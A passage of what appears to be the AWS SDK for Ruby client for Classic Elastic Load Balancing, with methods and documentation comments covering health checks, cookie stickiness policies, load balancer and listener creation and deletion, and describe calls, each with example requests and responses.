# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# health_check: {
# healthy_threshold: 2,
# interval: 30,
# target: "HTTP:80/png",
# timeout: 3,
# unhealthy_threshold: 2,
# },
# }
#
# @example Request syntax with placeholder values
#
# resp = client.configure_health_check({
# load_balancer_name: "AccessPointName", # required
# health_check: { # required
# target: "HealthCheckTarget", # required
# interval: 1, # required
# timeout: 1, # required
# unhealthy_threshold: 1, # required
# healthy_threshold: 1, # required
# },
# })
#
# @example Response structure
#
# resp.health_check.target #=> String
# resp.health_check.interval #=> Integer
# resp.health_check.timeout #=> Integer
# resp.health_check.unhealthy_threshold #=> Integer
# resp.health_check.healthy_threshold #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/ConfigureHealthCheck AWS API Documentation
#
# @overload configure_health_check(params = {})
# @param [Hash] params ({})
def configure_health_check(params = {}, options = {})
req = build_request(:configure_health_check, params)
req.send_request(options)
end
# Generates a stickiness policy with sticky session lifetimes that
# follow that of an application-generated cookie. This policy can be
# associated only with HTTP/HTTPS listeners.
#
# This policy is similar to the policy created by
# CreateLBCookieStickinessPolicy, except that the lifetime of the
# special Elastic Load Balancing cookie, `AWSELB`, follows the lifetime
# of the application-generated cookie specified in the policy
# configuration. The load balancer only inserts a new stickiness cookie
# when the application response includes a new application cookie.
#
# If the application cookie is explicitly removed or expires, the
# session stops being sticky until a new application cookie is issued.
#
# For more information, see [Application-Controlled Session
# Stickiness][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-sticky-sessions.html#enable-sticky-sessions-application
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, String] :policy_name
# The name of the policy being created. Policy names must consist of
# alphanumeric characters and dashes (-). This name must be unique
# within the set of policies for this load balancer.
#
# @option params [required, String] :cookie_name
# The name of the application cookie used for stickiness.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To generate a stickiness policy for your load balancer
#
# # This example generates a stickiness policy that follows the sticky session lifetimes of the application-generated
# # cookie.
#
# resp = client.create_app_cookie_stickiness_policy({
# cookie_name: "my-app-cookie",
# load_balancer_name: "my-load-balancer",
# policy_name: "my-app-cookie-policy",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.create_app_cookie_stickiness_policy({
# load_balancer_name: "AccessPointName", # required
# policy_name: "PolicyName", # required
# cookie_name: "CookieName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/CreateAppCookieStickinessPolicy AWS API Documentation
#
# @overload create_app_cookie_stickiness_policy(params = {})
# @param [Hash] params ({})
def create_app_cookie_stickiness_policy(params = {}, options = {})
req = build_request(:create_app_cookie_stickiness_policy, params)
req.send_request(options)
end
# Generates a stickiness policy with sticky session lifetimes controlled
# by the lifetime of the browser (user-agent) or a specified expiration
# period. This policy can be associated only with HTTP/HTTPS listeners.
#
# When a load balancer implements this policy, the load balancer uses a
# special cookie to track the instance for each request. When the load
# balancer receives a request, it first checks to see if this cookie is
# present in the request. If so, the load balancer sends the request to
# the application server specified in the cookie. If not, the load
# balancer sends the request to a server that is chosen based on the
# existing load-balancing algorithm.
#
# A cookie is inserted into the response for binding subsequent requests
# from the same user to that server. The validity of the cookie is based
# on the cookie expiration time, which is specified in the policy
# configuration.
#
# For more information, see [Duration-Based Session Stickiness][1] in
# the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-sticky-sessions.html#enable-sticky-sessions-duration
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, String] :policy_name
# The name of the policy being created. Policy names must consist of
# alphanumeric characters and dashes (-). This name must be unique
# within the set of policies for this load balancer.
#
# @option params [Integer] :cookie_expiration_period
# The time period, in seconds, after which the cookie should be
# considered stale. If you do not specify this parameter, the default
# value is 0, which indicates that the sticky session should last for
# the duration of the browser session.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To generate a duration-based stickiness policy for your load balancer
#
# # This example generates a stickiness policy with sticky session lifetimes controlled by the specified expiration period.
#
# resp = client.create_lb_cookie_stickiness_policy({
# cookie_expiration_period: 60,
# load_balancer_name: "my-load-balancer",
# policy_name: "my-duration-cookie-policy",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.create_lb_cookie_stickiness_policy({
# load_balancer_name: "AccessPointName", # required
# policy_name: "PolicyName", # required
# cookie_expiration_period: 1,
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/CreateLBCookieStickinessPolicy AWS API Documentation
#
# @overload create_lb_cookie_stickiness_policy(params = {})
# @param [Hash] params ({})
def create_lb_cookie_stickiness_policy(params = {}, options = {})
req = build_request(:create_lb_cookie_stickiness_policy, params)
req.send_request(options)
end
# Creates a Classic Load Balancer.
#
# You can add listeners, security groups, subnets, and tags when you
# create your load balancer, or you can add them later using
# CreateLoadBalancerListeners, ApplySecurityGroupsToLoadBalancer,
# AttachLoadBalancerToSubnets, and AddTags.
#
# To describe your current load balancers, see DescribeLoadBalancers.
# When you are finished with a load balancer, you can delete it using
# DeleteLoadBalancer.
#
# You can create up to 20 load balancers per region per account. You can
# request an increase for the number of load balancers for your account.
# For more information, see [Limits for Your Classic Load Balancer][1]
# in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-limits.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# This name must be unique within your set of load balancers for the
# region, must have a maximum of 32 characters, must contain only
# alphanumeric characters or hyphens, and cannot begin or end with a
# hyphen.
#
# @option params [required, Array<Types::Listener>] :listeners
# The listeners.
#
# For more information, see [Listeners for Your Classic Load
# Balancer][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-listener-config.html
#
# @option params [Array<String>] :availability_zones
# One or more Availability Zones from the same region as the load
# balancer.
#
# You must specify at least one Availability Zone.
#
# You can add more Availability Zones after you create the load balancer
# using EnableAvailabilityZonesForLoadBalancer.
#
# @option params [Array<String>] :subnets
# The IDs of the subnets in your VPC to attach to the load balancer.
# Specify one subnet per Availability Zone specified in
# `AvailabilityZones`.
#
# @option params [Array<String>] :security_groups
# The IDs of the security groups to assign to the load balancer.
#
# @option params [String] :scheme
# The type of a load balancer. Valid only for load balancers in a VPC.
#
# By default, Elastic Load Balancing creates an Internet-facing load
# balancer with a DNS name that resolves to public IP addresses. For
# more information about Internet-facing and Internal load balancers,
# see [Load Balancer Scheme][1] in the *Elastic Load Balancing User
# Guide*.
#
# Specify `internal` to create a load balancer with a DNS name that
# resolves to private IP addresses.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/userguide/how-elastic-load-balancing-works.html#load-balancer-scheme
#
# @option params [Array<Types::Tag>] :tags
# A list of tags to assign to the load balancer.
#
# For more information about tagging your load balancer, see [Tag Your
# Classic Load Balancer][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/add-remove-tags.html
#
# @return [Types::CreateAccessPointOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateAccessPointOutput#dns_name #dns_name} => String
#
#
# @example Example: To create an HTTP load balancer in a VPC
#
# # This example creates a load balancer with an HTTP listener in a VPC.
#
# resp = client.create_load_balancer({
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# ],
# load_balancer_name: "my-load-balancer",
# security_groups: [
# "sg-a61988c3",
# ],
# subnets: [
# "subnet-15aaab61",
# ],
# })
#
# resp.to_h outputs the following:
# {
# dns_name: "my-load-balancer-1234567890.us-west-2.elb.amazonaws.com",
# }
#
# @example Example: To create an HTTP load balancer in EC2-Classic
#
# # This example creates a load balancer with an HTTP listener in EC2-Classic.
#
# resp = client.create_load_balancer({
# availability_zones: [
# "us-west-2a",
# ],
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# dns_name: "my-load-balancer-123456789.us-west-2.elb.amazonaws.com",
# }
#
# @example Example: To create an HTTPS load balancer in a VPC
#
# # This example creates a load balancer with an HTTPS listener in a VPC.
#
# resp = client.create_load_balancer({
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 443,
# protocol: "HTTPS",
# ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/my-server-cert",
# },
# ],
# load_balancer_name: "my-load-balancer",
# security_groups: [
# "sg-a61988c3",
# ],
# subnets: [
# "subnet-15aaab61",
# ],
# })
#
# resp.to_h outputs the following:
# {
# dns_name: "my-load-balancer-1234567890.us-west-2.elb.amazonaws.com",
# }
#
# @example Example: To create an HTTPS load balancer in EC2-Classic
#
# # This example creates a load balancer with an HTTPS listener in EC2-Classic.
#
# resp = client.create_load_balancer({
# availability_zones: [
# "us-west-2a",
# ],
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 443,
# protocol: "HTTPS",
# ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/my-server-cert",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# dns_name: "my-load-balancer-123456789.us-west-2.elb.amazonaws.com",
# }
#
# @example Example: To create an internal load balancer
#
# # This example creates an internal load balancer with an HTTP listener in a VPC.
#
# resp = client.create_load_balancer({
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# ],
# load_balancer_name: "my-load-balancer",
# scheme: "internal",
# security_groups: [
# "sg-a61988c3",
# ],
# subnets: [
# "subnet-15aaab61",
# ],
# })
#
# resp.to_h outputs the following:
# {
# dns_name: "internal-my-load-balancer-123456789.us-west-2.elb.amazonaws.com",
# }
#
# @example Request syntax with placeholder values
#
# resp = client.create_load_balancer({
# load_balancer_name: "AccessPointName", # required
# listeners: [ # required
# {
# protocol: "Protocol", # required
# load_balancer_port: 1, # required
# instance_protocol: "Protocol",
# instance_port: 1, # required
# ssl_certificate_id: "SSLCertificateId",
# },
# ],
# availability_zones: ["AvailabilityZone"],
# subnets: ["SubnetId"],
# security_groups: ["SecurityGroupId"],
# scheme: "LoadBalancerScheme",
# tags: [
# {
# key: "TagKey", # required
# value: "TagValue",
# },
# ],
# })
#
# @example Response structure
#
# resp.dns_name #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/CreateLoadBalancer AWS API Documentation
#
# @overload create_load_balancer(params = {})
# @param [Hash] params ({})
def create_load_balancer(params = {}, options = {})
req = build_request(:create_load_balancer, params)
req.send_request(options)
end
# Creates one or more listeners for the specified load balancer. If a
# listener with the specified port does not already exist, it is
# created; otherwise, the properties of the new listener must match the
# properties of the existing listener.
#
# For more information, see [Listeners for Your Classic Load
# Balancer][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-listener-config.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<Types::Listener>] :listeners
# The listeners.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To create an HTTP listener for a load balancer
#
# # This example creates a listener for your load balancer at port 80 using the HTTP protocol.
#
# resp = client.create_load_balancer_listeners({
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# @example Example: To create an HTTPS listener for a load balancer
#
# # This example creates a listener for your load balancer at port 443 using the HTTPS protocol.
#
# resp = client.create_load_balancer_listeners({
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 443,
# protocol: "HTTPS",
# ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/my-server-cert",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.create_load_balancer_listeners({
# load_balancer_name: "AccessPointName", # required
# listeners: [ # required
# {
# protocol: "Protocol", # required
# load_balancer_port: 1, # required
# instance_protocol: "Protocol",
# instance_port: 1, # required
# ssl_certificate_id: "SSLCertificateId",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/CreateLoadBalancerListeners AWS API Documentation
#
# @overload create_load_balancer_listeners(params = {})
# @param [Hash] params ({})
def create_load_balancer_listeners(params = {}, options = {})
req = build_request(:create_load_balancer_listeners, params)
req.send_request(options)
end
# Creates a policy with the specified attributes for the specified load
# balancer.
#
# Policies are settings that are saved for your load balancer and that
# can be applied to the listener or the application server, depending on
# the policy type.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, String] :policy_name
# The name of the load balancer policy to be created. This name must be
# unique within the set of policies for this load balancer.
#
# @option params [required, String] :policy_type_name
# The name of the base policy type. To get the list of policy types, use
# DescribeLoadBalancerPolicyTypes.
#
# @option params [Array<Types::PolicyAttribute>] :policy_attributes
# The policy attributes.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To create a policy that enables Proxy Protocol on a load balancer
#
# # This example creates a policy that enables Proxy Protocol on the specified load balancer.
#
# resp = client.create_load_balancer_policy({
# load_balancer_name: "my-load-balancer",
# policy_attributes: [
# {
# attribute_name: "ProxyProtocol",
# attribute_value: "true",
# },
# ],
# policy_name: "my-ProxyProtocol-policy",
# policy_type_name: "ProxyProtocolPolicyType",
# })
#
# @example Example: To create a public key policy
#
# # This example creates a public key policy.
#
# resp = client.create_load_balancer_policy({
# load_balancer_name: "my-load-balancer",
# policy_attributes: [
# {
# attribute_name: "PublicKey",
# attribute_value: "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwAYUjnfyEyXr1pxjhFWBpMlggUcqoi3kl+dS74kj//c6x7ROtusUaeQCTgIUkayttRDWchuqo1pHC1u+n5xxXnBBe2ejbb2WRsKIQ5rXEeixsjFpFsojpSQKkzhVGI6mJVZBJDVKSHmswnwLBdofLhzvllpovBPTHe+o4haAWvDBALJU0pkSI1FecPHcs2hwxf14zHoXy1e2k36A64nXW43wtfx5qcVSIxtCEOjnYRg7RPvybaGfQ+v6Iaxb/+7J5kEvZhTFQId+bSiJImF1FSUT1W1xwzBZPUbcUkkXDj45vC2s3Z8E+Lk7a3uZhvsQHLZnrfuWjBWGWvZ/MhZYgEXAMPLE",
# },
# ],
# policy_name: "my-PublicKey-policy",
# policy_type_name: "PublicKeyPolicyType",
# })
#
# @example Example: To create a backend server authentication policy
#
# # This example creates a backend server authentication policy that enables authentication on your backend instance using a
# # public key policy.
#
# resp = client.create_load_balancer_policy({
# load_balancer_name: "my-load-balancer",
# policy_attributes: [
# {
# attribute_name: "PublicKeyPolicyName",
# attribute_value: "my-PublicKey-policy",
# },
# ],
# policy_name: "my-authentication-policy",
# policy_type_name: "BackendServerAuthenticationPolicyType",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.create_load_balancer_policy({
# load_balancer_name: "AccessPointName", # required
# policy_name: "PolicyName", # required
# policy_type_name: "PolicyTypeName", # required
# policy_attributes: [
# {
# attribute_name: "AttributeName",
# attribute_value: "AttributeValue",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/CreateLoadBalancerPolicy AWS API Documentation
#
# @overload create_load_balancer_policy(params = {})
# @param [Hash] params ({})
def create_load_balancer_policy(params = {}, options = {})
req = build_request(:create_load_balancer_policy, params)
req.send_request(options)
end
# Deletes the specified load balancer.
#
# If you are attempting to recreate a load balancer, you must
# reconfigure all settings. The DNS name associated with a deleted load
# balancer are no longer usable. The name and associated DNS record of
# the deleted load balancer no longer exist and traffic sent to any of
# its IP addresses is no longer delivered to your instances.
#
# If the load balancer does not exist or has already been deleted, the
# call to `DeleteLoadBalancer` still succeeds.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To delete a load balancer
#
# # This example deletes the specified load balancer.
#
# resp = client.delete_load_balancer({
# load_balancer_name: "my-load-balancer",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.delete_load_balancer({
# load_balancer_name: "AccessPointName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DeleteLoadBalancer AWS API Documentation
#
# @overload delete_load_balancer(params = {})
# @param [Hash] params ({})
def delete_load_balancer(params = {}, options = {})
req = build_request(:delete_load_balancer, params)
req.send_request(options)
end
# Deletes the specified listeners from the specified load balancer.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<Integer>] :load_balancer_ports
# The client port numbers of the listeners.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To delete a listener from your load balancer
#
# # This example deletes the listener for the specified port from the specified load balancer.
#
# resp = client.delete_load_balancer_listeners({
# load_balancer_name: "my-load-balancer",
# load_balancer_ports: [
# 80,
# ],
# })
#
# @example Request syntax with placeholder values
#
# resp = client.delete_load_balancer_listeners({
# load_balancer_name: "AccessPointName", # required
# load_balancer_ports: [1], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DeleteLoadBalancerListeners AWS API Documentation
#
# @overload delete_load_balancer_listeners(params = {})
# @param [Hash] params ({})
def delete_load_balancer_listeners(params = {}, options = {})
req = build_request(:delete_load_balancer_listeners, params)
req.send_request(options)
end
# Deletes the specified policy from the specified load balancer. This
# policy must not be enabled for any listeners.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, String] :policy_name
# The name of the policy.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To delete a policy from your load balancer
#
# # This example deletes the specified policy from the specified load balancer. The policy must not be enabled on any
# # listener.
#
# resp = client.delete_load_balancer_policy({
# load_balancer_name: "my-load-balancer",
# policy_name: "my-duration-cookie-policy",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.delete_load_balancer_policy({
# load_balancer_name: "AccessPointName", # required
# policy_name: "PolicyName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DeleteLoadBalancerPolicy AWS API Documentation
#
# @overload delete_load_balancer_policy(params = {})
# @param [Hash] params ({})
def delete_load_balancer_policy(params = {}, options = {})
req = build_request(:delete_load_balancer_policy, params)
req.send_request(options)
end
# Deregisters the specified instances from the specified load balancer.
# After the instance is deregistered, it no longer receives traffic from
# the load balancer.
#
# You can use DescribeLoadBalancers to verify that the instance is
# deregistered from the load balancer.
#
# For more information, see [Register or De-Register EC2 Instances][1]
# in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-deregister-register-instances.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<Types::Instance>] :instances
# The IDs of the instances.
#
# @return [Types::DeregisterEndPointsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeregisterEndPointsOutput#instances #instances} => Array<Types::Instance>
#
#
# @example Example: To deregister instances from a load balancer
#
# # This example deregisters the specified instance from the specified load balancer.
#
# resp = client.deregister_instances_from_load_balancer({
# instances: [
# {
# instance_id: "i-d6f6fae3",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# instances: [
# {
# instance_id: "i-207d9717",
# },
# {
# instance_id: "i-afefb49b",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.deregister_instances_from_load_balancer({
# load_balancer_name: "AccessPointName", # required
# instances: [ # required
# {
# instance_id: "InstanceId",
# },
# ],
# })
#
# @example Response structure
#
# resp.instances #=> Array
# resp.instances[0].instance_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DeregisterInstancesFromLoadBalancer AWS API Documentation
#
# @overload deregister_instances_from_load_balancer(params = {})
# @param [Hash] params ({})
def deregister_instances_from_load_balancer(params = {}, options = {})
req = build_request(:deregister_instances_from_load_balancer, params)
req.send_request(options)
end
# Describes the current Elastic Load Balancing resource limits for your
# AWS account.
#
# For more information, see [Limits for Your Classic Load Balancer][1]
# in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-limits.html
#
# @option params [String] :marker
# The marker for the next set of results. (You received this marker from
# a previous call.)
#
# @option params [Integer] :page_size
# The maximum number of results to return with this call.
#
# @return [Types::DescribeAccountLimitsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeAccountLimitsOutput#limits #limits} => Array<Types::Limit>
# * {Types::DescribeAccountLimitsOutput#next_marker #next_marker} => String
#
# @example Request syntax with placeholder values
#
# resp = client.describe_account_limits({
# marker: "Marker",
# page_size: 1,
# })
#
# @example Response structure
#
# resp.limits #=> Array
# resp.limits[0].name #=> String
# resp.limits[0].max #=> String
# resp.next_marker #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeAccountLimits AWS API Documentation
#
# @overload describe_account_limits(params = {})
# @param [Hash] params ({})
def describe_account_limits(params = {}, options = {})
req = build_request(:describe_account_limits, params)
req.send_request(options)
end
# Describes the state of the specified instances with respect to the
# specified load balancer. If no instances are specified, the call
# describes the state of all instances that are currently registered
# with the load balancer. If instances are specified, their state is
# returned even if they are no longer registered with the load balancer.
# The state of terminated instances is not returned.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [Array<Types::Instance>] :instances
# The IDs of the instances.
#
# @return [Types::DescribeEndPointStateOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeEndPointStateOutput#instance_states #instance_states} => Array<Types::InstanceState>
#
#
# @example Example: To describe the health of the instances for a load balancer
#
# # This example describes the health of the instances for the specified load balancer.
#
# resp = client.describe_instance_health({
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# instance_states: [
# {
# description: "N/A",
# instance_id: "i-207d9717",
# reason_code: "N/A",
# state: "InService",
# },
# {
# description: "N/A",
# instance_id: "i-afefb49b",
# reason_code: "N/A",
# state: "InService",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_instance_health({
# load_balancer_name: "AccessPointName", # required
# instances: [
# {
# instance_id: "InstanceId",
# },
# ],
# })
#
# @example Response structure
#
# resp.instance_states #=> Array
# resp.instance_states[0].instance_id #=> String
# resp.instance_states[0].state #=> String
# resp.instance_states[0].reason_code #=> String
# resp.instance_states[0].description #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeInstanceHealth AWS API Documentation
#
# @overload describe_instance_health(params = {})
# @param [Hash] params ({})
def describe_instance_health(params = {}, options = {})
req = build_request(:describe_instance_health, params)
req.send_request(options)
end
# Describes the attributes for the specified load balancer.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @return [Types::DescribeLoadBalancerAttributesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeLoadBalancerAttributesOutput#load_balancer_attributes #load_balancer_attributes} => Types::LoadBalancerAttributes
#
#
# @example Example: To describe the attributes of a load balancer
#
# # This example describes the attributes of the specified load balancer.
#
# resp = client.describe_load_balancer_attributes({
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# load_balancer_attributes: {
# access_log: {
# enabled: false,
# },
# connection_draining: {
# enabled: false,
# timeout: 300,
# },
# connection_settings: {
# idle_timeout: 60,
# },
# cross_zone_load_balancing: {
# enabled: false,
# },
# },
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_load_balancer_attributes({
# load_balancer_name: "AccessPointName", # required
# })
#
# @example Response structure
#
# resp.load_balancer_attributes.cross_zone_load_balancing.enabled #=> Boolean
# resp.load_balancer_attributes.access_log.enabled #=> Boolean
# resp.load_balancer_attributes.access_log.s3_bucket_name #=> String
# resp.load_balancer_attributes.access_log.emit_interval #=> Integer
# resp.load_balancer_attributes.access_log.s3_bucket_prefix #=> String
# resp.load_balancer_attributes.connection_draining.enabled #=> Boolean
# resp.load_balancer_attributes.connection_draining.timeout #=> Integer
# resp.load_balancer_attributes.connection_settings.idle_timeout #=> Integer
# resp.load_balancer_attributes.additional_attributes #=> Array
# resp.load_balancer_attributes.additional_attributes[0].key #=> String
# resp.load_balancer_attributes.additional_attributes[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeLoadBalancerAttributes AWS API Documentation
#
# @overload describe_load_balancer_attributes(params = {})
# @param [Hash] params ({})
def describe_load_balancer_attributes(params = {}, options = {})
req = build_request(:describe_load_balancer_attributes, params)
req.send_request(options)
end
# Describes the specified policies.
#
# If you specify a load balancer name, the action returns the
# descriptions of all policies created for the load balancer. If you
# specify a policy name associated with your load balancer, the action
# returns the description of that policy. If you don't specify a load
# balancer name, the action returns descriptions of the specified sample
# policies, or descriptions of all sample policies. The names of the
# sample policies have the `ELBSample-` prefix.
#
# @option params [String] :load_balancer_name
# The name of the load balancer.
#
# @option params [Array<String>] :policy_names
# The names of the policies.
#
# @return [Types::DescribeLoadBalancerPoliciesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeLoadBalancerPoliciesOutput#policy_descriptions #policy_descriptions} => Array<Types::PolicyDescription>
#
#
# @example Example: To describe a policy associated with a load balancer
#
# # This example describes the specified policy associated with the specified load balancer.
#
# resp = client.describe_load_balancer_policies({
# load_balancer_name: "my-load-balancer",
# policy_names: [
# "my-authentication-policy",
# ],
# })
#
# resp.to_h outputs the following:
# {
# policy_descriptions: [
# {
# policy_attribute_descriptions: [
# {
# attribute_name: "PublicKeyPolicyName",
# attribute_value: "my-PublicKey-policy",
# },
# ],
# policy_name: "my-authentication-policy",
# policy_type_name: "BackendServerAuthenticationPolicyType",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_load_balancer_policies({
# load_balancer_name: "AccessPointName",
# policy_names: ["PolicyName"],
# })
#
# @example Response structure
#
# resp.policy_descriptions #=> Array
# resp.policy_descriptions[0].policy_name #=> String
# resp.policy_descriptions[0].policy_type_name #=> String
# resp.policy_descriptions[0].policy_attribute_descriptions #=> Array
# resp.policy_descriptions[0].policy_attribute_descriptions[0].attribute_name #=> String
# resp.policy_descriptions[0].policy_attribute_descriptions[0].attribute_value #=> <Hash,Array,String,Numeric,Boolean,IO,Set,nil>
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeLoadBalancerPolicies AWS API Documentation
#
# @overload describe_load_balancer_policies(params = {})
# @param [Hash] params ({})
def describe_load_balancer_policies(params = {}, options = {})
req = build_request(:describe_load_balancer_policies, params)
req.send_request(options)
end
# Describes the specified load balancer policy types or all load
# balancer policy types.
#
# The description of each type indicates how it can be used. For
# example, some policies can be used only with layer 7 listeners, some
# policies can be used only with layer 4 listeners, and some policies
# can be used only with your EC2 instances.
#
# You can use CreateLoadBalancerPolicy to create a policy configuration
# for any of these policy types. Then, depending on the policy type, use
# either SetLoadBalancerPoliciesOfListener or
# SetLoadBalancerPoliciesForBackendServer to set the policy.
#
# @option params [Array<String>] :policy_type_names
# The names of the policy types. If no names are specified, describes
# all policy types defined by Elastic Load Balancing.
#
# @return [Types::DescribeLoadBalancerPolicyTypesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeLoadBalancerPolicyTypesOutput#policy_type_descriptions #policy_type_descriptions} => Array<Types::PolicyTypeDescription>
#
#
# @example Example: To describe a load balancer policy type defined by Elastic Load Balancing
#
# # This example describes the specified load balancer policy type.
#
# resp = client.describe_load_balancer_policy_types({
# policy_type_names: [
# "ProxyProtocolPolicyType",
# ],
# })
#
# resp.to_h outputs the following:
# {
# policy_type_descriptions: [
# {
# description: "Policy that controls whether to include the IP address and port of the originating request for TCP messages. This policy operates on TCP listeners only.",
# policy_attribute_type_descriptions: [
# {
# attribute_name: "ProxyProtocol",
# attribute_type: "Boolean",
# cardinality: "ONE",
# },
# ],
# policy_type_name: "ProxyProtocolPolicyType",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_load_balancer_policy_types({
# policy_type_names: ["PolicyTypeName"],
# })
#
# @example Response structure
#
# resp.policy_type_descriptions #=> Array
# resp.policy_type_descriptions[0].policy_type_name #=> String
# resp.policy_type_descriptions[0].description #=> String
# resp.policy_type_descriptions[0].policy_attribute_type_descriptions #=> Array
# resp.policy_type_descriptions[0].policy_attribute_type_descriptions[0].attribute_name #=> String
# resp.policy_type_descriptions[0].policy_attribute_type_descriptions[0].attribute_type #=> String
# resp.policy_type_descriptions[0].policy_attribute_type_descriptions[0].description #=> String
